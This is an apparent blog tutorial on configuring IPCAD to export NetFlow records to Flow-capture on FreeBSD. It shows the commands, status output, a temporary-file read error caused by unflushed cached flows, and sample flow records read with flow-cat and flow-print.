Let's set up Flow-capture to collect NetFlow records:

orr:/root# mkdir -p /nsm/netflow/ipcad/wi0
orr:/root# flow-capture -w /nsm/netflow/ipcad/wi0 localhost/localhost/9995

I verify that Flow-capture is listening on the port I specified:

orr:/root# sockstat -4
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
root flow-captu 919 1 udp4 127.0.0.1:9995 *:*

Now I tell IPCAD to export NetFlow records by adding the following to the end of the ipcad.conf file.

netflow export destination 127.0.0.1 9995

Again I shut down IPCAD, restart it, and then clear the records. Notice that IPCAD reports a NetFlow destination.

orr:/root# rsh localhost shutdown
connect to address ::1: Connection refused
Trying 127.0.0.1...
Shutdown process started
orr:/root# ipcad -drs
Opening wi0... [LCap] [ERSH] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
Configured NetFlow destination at 127.0.0.1:9995
138 elements got from ipcad.dump.
Daemonized.

After a few minutes I check IPCAD's status.

orr:/root# rsh localhost status
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 548, 5 m average 683 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 193
NetFlow cached flows: 21
Memory usage: 1% (16984 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 1 hour,

Notice how IPCAD reports 21 cached NetFlows. This caused a problem, since apparently IPCAD had not flushed any flows to disk yet. I got the following error when trying to read the flows using Flow-cat and Flow-print:

orr:/root# flow-cat /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/ | flow-print
flow-print: ftiheader_read(): Warning, short read while loading header top.
flow-print: ftiheader_read(): failed
flow-print: ftio_init(): failed

Looking at the directory holding the flows, we see only a .tmp file:

orr:/root# ls /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/
tmp-v05.2005-04-13.235643-0400

One minute later I check IPCAD's status again:

orr:/root# rsh localhost status
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 638, 5 m average 638 bytes/sec, 0 pkts/sec, dropped 0
Flow entries made: 195
NetFlow cached flows: 0
Memory usage: 1% (17160 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 4 minutes
orr.taosecurity.com uptime is 1:01

Now we see zero cached flows, so I use Flow-cat and Flow-print again.

orr:/root# flow-cat /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/ | flow-print
srcIP dstIP prot srcPort dstPort octets packets
131.106.56.63 224.0.0.251 17 5353 5353 686 2
131.106.58.184 224.0.0.251 17 5353 5353 189 1
0.0.0.0 224.0.0.1 2 65535 65535 28 1
...edited...
131.106.57.94 131.106.63.255 17 137 137 702 9
131.106.57.94 131.106.63.255 17 138 138 817 4
66.102.15.100 131.106.57.173 6 80 53759 125977 133
131.106.57.173 66.102.15.100 6 53759 80 47834 102
...truncated...

We can view these records because the .tmp file is replaced by a real flow record:

orr:/root# ls /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/
ft-v05.2005-04-13.235643-0400

Hopefully you have a better idea how NetFlow works. If you're a student, you now have the additional material I discussed in class that didn't appear on the slides!

Also -- here is a link to my blog entry on the method I'm using now to bond interfaces into ngeth0 on FreeBSD 5.3. Here is a link to my post on Flowgrep.

For news on the new Sguil FreeBSD port submissions, check on Problem Report ports/77473 for the Sguil-sensor and Problem Report ports/77690 for the Sguil-server.